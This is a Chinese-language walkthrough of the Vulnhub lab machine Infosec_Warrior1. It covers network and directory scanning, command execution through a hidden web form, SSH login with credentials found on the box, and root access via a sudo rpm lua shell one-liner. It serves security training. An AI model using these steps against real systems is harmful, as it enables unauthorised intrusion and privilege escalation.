Vulnhub靶机Infosec_Warrior1渗透

信息收集

主机发现

arp-scan -l

端口扫描

nmap -A -p- 192.168.160.39

目录爆破

dirsearch -u http://192.168.160.39

命令解释：

• dirsearch：是运行的工具的名称。

• -u http://192.168.60.39：指定要执行目录枚举的目标 URL。确保包含http://前缀。

• -i 200：此选项指示dirsearch仅显示返回 HTTP 状态代码 的目录200，这通常表示该目录存在并且可以访问。

  • 补充： -e php,html：此选项指定在目录枚举期间要查找的文件扩展名。

访问80端口，只能看出是Apache站点，没有别的

访问一下sitemap.xml

访问192.168.80.145/index.htnl，也没啥有用的，只有一张gif格式的动态图

查看页面源代码，发现隐藏的一个form表单,可以删除hidden='True'，回车！

因为靶机是在Centos系统上，所以在输入框中输入ls，没有得到正常的回显

把from表单换成post请求

再次在 输入框中输入ls，成功有了 回显

查看cmd.php，在表单中输入cat cmd.php

使用ssh远程连接 ssh [email protected] 密码：123456789blabla

如果ssh [email protected]连接时回应的是：Unable to negotiate with 192.168.160.39 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss ,可以使用：

ssh -oHostKeyAlgorithms=+ssh-rsa [email protected]

提权

连接成功后，sudo -l查看有哪些能以root身份执行的命令

去这个网站上找提权命令：https://gtfobins.github.io/

只能找到rpm命令字的提权方式

输入命令：

sudo rpm --eval '%{lua:os.execute("/bin/sh")}'

提权成功：